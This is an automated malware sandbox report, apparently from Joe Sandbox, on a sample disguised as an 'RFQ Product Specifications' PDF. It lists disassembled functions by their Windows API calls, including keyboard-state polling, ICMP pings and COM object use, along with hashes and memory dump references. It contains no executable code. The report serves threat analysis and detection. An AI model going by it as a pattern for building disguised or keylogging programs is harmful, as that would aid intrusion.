                                                                                                                Function 00AC3C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(?), ref: 00AC3C5C
                                                                                                                • CoInitialize.OLE32(00000000), ref: 00AC3C8A
                                                                                                                • CoUninitialize.OLE32 ref: 00AC3C94
                                                                                                                • _wcslen.LIBCMT ref: 00AC3D2D
                                                                                                                • GetRunningObjectTable.OLE32(00000000,?), ref: 00AC3DB1
                                                                                                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 00AC3ED5
                                                                                                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00AC3F0E
                                                                                                                • CoGetObject.OLE32(?,00000000,00ADFB98,?), ref: 00AC3F2D
                                                                                                                • SetErrorMode.KERNEL32(00000000), ref: 00AC3F40
                                                                                                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00AC3FC4
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00AC3FD8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 429561992-0
                                                                                                                • Opcode ID: 01a26dad44fc62bcf85525952780e95af9892dee7417036044ed6da6724ca9df
                                                                                                                • Instruction ID: 6a41abf3766cd7f327a3f01aa68069b15c2dcec528243f545c3c6545f10c2692
                                                                                                                • Opcode Fuzzy Hash: 01a26dad44fc62bcf85525952780e95af9892dee7417036044ed6da6724ca9df
                                                                                                                • Instruction Fuzzy Hash: D7C115726082059FDB00DF68C984E2BB7E9FF89744F11891DF98A9B251D731EE06CB52
                                                                                                                Function 00AB7A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CoInitialize.OLE32(00000000), ref: 00AB7AF3
                                                                                                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00AB7B8F
                                                                                                                • SHGetDesktopFolder.SHELL32(?), ref: 00AB7BA3
                                                                                                                • CoCreateInstance.OLE32(00ADFD08,00000000,00000001,00B06E6C,?), ref: 00AB7BEF
                                                                                                                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00AB7C74
                                                                                                                • CoTaskMemFree.OLE32(?,?), ref: 00AB7CCC
                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00AB7D57
                                                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00AB7D7A
                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00AB7D81
                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00AB7DD6
                                                                                                                • CoUninitialize.OLE32 ref: 00AB7DDC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 2762341140-0
                                                                                                                • Opcode ID: 1c2907fe20cd86364bec200d2c23638345bff663945df9f24f66128573e122be
                                                                                                                • Instruction ID: 52d02e2d1b6d7e26fb929cfc841e939c1a28b22c2a6a04e789208e6ec30657c2
                                                                                                                • Opcode Fuzzy Hash: 1c2907fe20cd86364bec200d2c23638345bff663945df9f24f66128573e122be
                                                                                                                • Instruction Fuzzy Hash: 96C10B75A04115AFCB14DFA4C988DAEBBF9FF88314B148499E81A9B362D730ED45CF90
                                                                                                                Function 00AD541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00AD5504
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00AD5515
                                                                                                                • CharNextW.USER32(00000158), ref: 00AD5544
                                                                                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00AD5585
                                                                                                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00AD559B
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00AD55AC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CharNext
                                                                                                                • String ID:
                                                                                                                • API String ID: 1350042424-0
                                                                                                                • Opcode ID: 880ba73d5d6e25cbbba75f8470b2e99550fac55f3b140f190036a4fdc33914a4
                                                                                                                • Instruction ID: 484b4b99dbfe5f044a43a024bddb035204eee7b81f138713cb9995121e474d99
                                                                                                                • Opcode Fuzzy Hash: 880ba73d5d6e25cbbba75f8470b2e99550fac55f3b140f190036a4fdc33914a4
                                                                                                                • Instruction Fuzzy Hash: 47616D70D01609AFDF11DFA4CC849FE7BB9EB09760F50814AF926A7390D7748A81DB61
                                                                                                                Function 00A9FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00A9FAAF
                                                                                                                • SafeArrayAllocData.OLEAUT32(?), ref: 00A9FB08
                                                                                                                • VariantInit.OLEAUT32(?), ref: 00A9FB1A
                                                                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00A9FB3A
                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00A9FB8D
                                                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 00A9FBA1
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00A9FBB6
                                                                                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 00A9FBC3
                                                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A9FBCC
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00A9FBDE
                                                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A9FBE9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                • String ID:
                                                                                                                • API String ID: 2706829360-0
                                                                                                                • Opcode ID: 7122faa452634aacefffb632ef800f42c205227d7c4eaf7bbf8fe98f0d41ef72
                                                                                                                • Instruction ID: e5ccdf0031e1bc9158ee8e2e7b8edbd114cf63e9da413c822346d932f17d5f7c
                                                                                                                • Opcode Fuzzy Hash: 7122faa452634aacefffb632ef800f42c205227d7c4eaf7bbf8fe98f0d41ef72
                                                                                                                • Instruction Fuzzy Hash: 0E414275A012199FCF00DFA8D8589EEBBB9FF48354F408065E956E7261C770A946CF90
                                                                                                                Function 00AA9C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetKeyboardState.USER32(?), ref: 00AA9CA1
                                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00AA9D22
                                                                                                                • GetKeyState.USER32(000000A0), ref: 00AA9D3D
                                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00AA9D57
                                                                                                                • GetKeyState.USER32(000000A1), ref: 00AA9D6C
                                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 00AA9D84
                                                                                                                • GetKeyState.USER32(00000011), ref: 00AA9D96
                                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 00AA9DAE
                                                                                                                • GetKeyState.USER32(00000012), ref: 00AA9DC0
                                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00AA9DD8
                                                                                                                • GetKeyState.USER32(0000005B), ref: 00AA9DEA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: State$Async$Keyboard
                                                                                                                • String ID:
                                                                                                                • API String ID: 541375521-0
                                                                                                                • Opcode ID: 6b77635525df0f3f266d2df3dbf9d20b41f5e8e86ffa3cca2618b1ca1a397fb2
                                                                                                                • Instruction ID: ea00c8288e2c1ff50c66ffd2109ede5f368d2ba5f33c12f2d7220195612d9661
                                                                                                                • Opcode Fuzzy Hash: 6b77635525df0f3f266d2df3dbf9d20b41f5e8e86ffa3cca2618b1ca1a397fb2
                                                                                                                • Instruction Fuzzy Hash: 4741C634504BCA6DFF719B6088443B7BEA06F13354F44805ADAC7575C2EBA599C8C7A2
                                                                                                                Function 00AC055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • WSAStartup.WSOCK32(00000101,?), ref: 00AC05BC
                                                                                                                • inet_addr.WSOCK32(?), ref: 00AC061C
                                                                                                                • gethostbyname.WSOCK32(?), ref: 00AC0628
                                                                                                                • IcmpCreateFile.IPHLPAPI ref: 00AC0636
                                                                                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00AC06C6
                                                                                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00AC06E5
                                                                                                                • IcmpCloseHandle.IPHLPAPI(?), ref: 00AC07B9
                                                                                                                • WSACleanup.WSOCK32 ref: 00AC07BF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                • String ID: Ping
                                                                                                                • API String ID: 1028309954-2246546115
                                                                                                                • Opcode ID: 62d55d223b7bf701779e72f813a245d8d230d8988c848c125ed4a0ce6a19a07f
                                                                                                                • Instruction ID: 22a82a2485c69b7fb5b7f467a6090fd1db2ac7d5fcc230f041ca7b25d8105ea0
                                                                                                                • Opcode Fuzzy Hash: 62d55d223b7bf701779e72f813a245d8d230d8988c848c125ed4a0ce6a19a07f
                                                                                                                • Instruction Fuzzy Hash: B291AB35608601DFD724CF15C989F1ABBE0AF84328F1685ADF46A8B6A2C770ED45CF91
                                                                                                                Function 00AC8CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcslen$BuffCharLower
                                                                                                                • String ID: cdecl$none$stdcall$winapi
                                                                                                                • API String ID: 707087890-567219261
                                                                                                                • Opcode ID: 99f883fb9a96c6098eff61747e1428c847d30464b15459754fe4e052bd2f69ae
                                                                                                                • Instruction ID: 0574849f3513e1ed5b43a9e299b3da657eafe82c8086d3c56590dd6db5819cd2
                                                                                                                • Opcode Fuzzy Hash: 99f883fb9a96c6098eff61747e1428c847d30464b15459754fe4e052bd2f69ae
                                                                                                                • Instruction Fuzzy Hash: CE518032A001169BCB14DF6CC940ABEB7B5BF65724B22422DE426E72C5DF39DD40C790
                                                                                                                Function 00AC372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CoInitialize.OLE32 ref: 00AC3774
                                                                                                                • CoUninitialize.OLE32 ref: 00AC377F
                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000017,00ADFB78,?), ref: 00AC37D9
                                                                                                                • IIDFromString.OLE32(?,?), ref: 00AC384C
                                                                                                                • VariantInit.OLEAUT32(?), ref: 00AC38E4
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00AC3936
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                • API String ID: 636576611-1287834457
                                                                                                                • Opcode ID: f0cd792bf03a307826e19ab43b651bb018525c46a20269cf6f265a480260e4e5
                                                                                                                • Instruction ID: 6abc4e766f25a6acc1b669dc1c6c1105802a91df0e4f654e9dfdda93a755a8a1
                                                                                                                • Opcode Fuzzy Hash: f0cd792bf03a307826e19ab43b651bb018525c46a20269cf6f265a480260e4e5
                                                                                                                • Instruction Fuzzy Hash: 9A61B172608311AFD710DF54C948F6ABBE8EF49714F11884DF9859B291C770EE49CB92
                                                                                                                Function 00AB3388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00AB33CF
                                                                                                                  • Part of subcall function 00A49CB3: _wcslen.LIBCMT ref: 00A49CBD
                                                                                                                • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00AB33F0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LoadString$_wcslen
                                                                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                • API String ID: 4099089115-3080491070
                                                                                                                • Opcode ID: e0586294336ca40eae1b6e06e8e308467a740229c9046ec83d5eb44a1135f33d
                                                                                                                • Instruction ID: 3596fd1e4ebab32a6e8c66a7608e4467576b8b6d0eae4ac6db335f458fbd51c1
                                                                                                                • Opcode Fuzzy Hash: e0586294336ca40eae1b6e06e8e308467a740229c9046ec83d5eb44a1135f33d
                                                                                                                • Instruction Fuzzy Hash: 51519C32940209BEDF14EBA0DE46EEEB7B8AF44340F104165F505730A2EB316F68DB61
                                                                                                                Function 00AAB5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcslen$BuffCharUpper
                                                                                                                • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                • API String ID: 1256254125-769500911
                                                                                                                • Opcode ID: 6d7335c9fc54b424e575121fdce4ee8e3f3134208bd9e3fc8cd6b327b3504b54
                                                                                                                • Instruction ID: c28395c147e81d0cd93d509f1cde85dd6089eb294acff4505d4d4c3df27e1aaf
                                                                                                                • Opcode Fuzzy Hash: 6d7335c9fc54b424e575121fdce4ee8e3f3134208bd9e3fc8cd6b327b3504b54
                                                                                                                • Instruction Fuzzy Hash: 8D410533A111269ACB209F7DC9905BEB7B5AFA2754B244129E821DB2C2E731CD81C7A0
                                                                                                                Function 00AB5393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 00AB53A0
                                                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00AB5416
                                                                                                                • GetLastError.KERNEL32 ref: 00AB5420
                                                                                                                • SetErrorMode.KERNEL32(00000000,READY), ref: 00AB54A7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                • API String ID: 4194297153-14809454
                                                                                                                • Opcode ID: 7b247a2e93a0abfb3835f6d8af9a221f711ad2ebb4a00d310f794abd97bec0d1
                                                                                                                • Instruction ID: 5c6489d25ed2e954bea81f28e9a6275529360c0cbaad5172f9783fe5341c96cd
                                                                                                                • Opcode Fuzzy Hash: 7b247a2e93a0abfb3835f6d8af9a221f711ad2ebb4a00d310f794abd97bec0d1
                                                                                                                • Instruction Fuzzy Hash: 1C318D39E006059FD710DF68C584BEABBB9EF45305F1480A5E406CB293DB71DD86CB91
                                                                                                                Function 00AD3C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateMenu.USER32 ref: 00AD3C79
                                                                                                                • SetMenu.USER32(?,00000000), ref: 00AD3C88
                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AD3D10
                                                                                                                • IsMenu.USER32(?), ref: 00AD3D24
                                                                                                                • CreatePopupMenu.USER32 ref: 00AD3D2E
                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00AD3D5B
                                                                                                                • DrawMenuBar.USER32 ref: 00AD3D63
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                • String ID: 0$F
                                                                                                                • API String ID: 161812096-3044882817
                                                                                                                • Opcode ID: bab9829f1e30a4f8106342835f33d49fed2c60e80337477efb6b27bfb01f3e16
                                                                                                                • Instruction ID: 77665151fba2b13b74cfffcbd040009cbd0eda6332cef39dc57075e2141ac0e0
                                                                                                                • Opcode Fuzzy Hash: bab9829f1e30a4f8106342835f33d49fed2c60e80337477efb6b27bfb01f3e16
                                                                                                                • Instruction Fuzzy Hash: CE416C79A0120AAFDF14CFA4E844AEA77B6FF49350F14042AE95797360D730AA11CF51
                                                                                                                Function 00AD3A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00AD3A9D
                                                                                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00AD3AA0
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00AD3AC7
                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00AD3AEA
                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00AD3B62
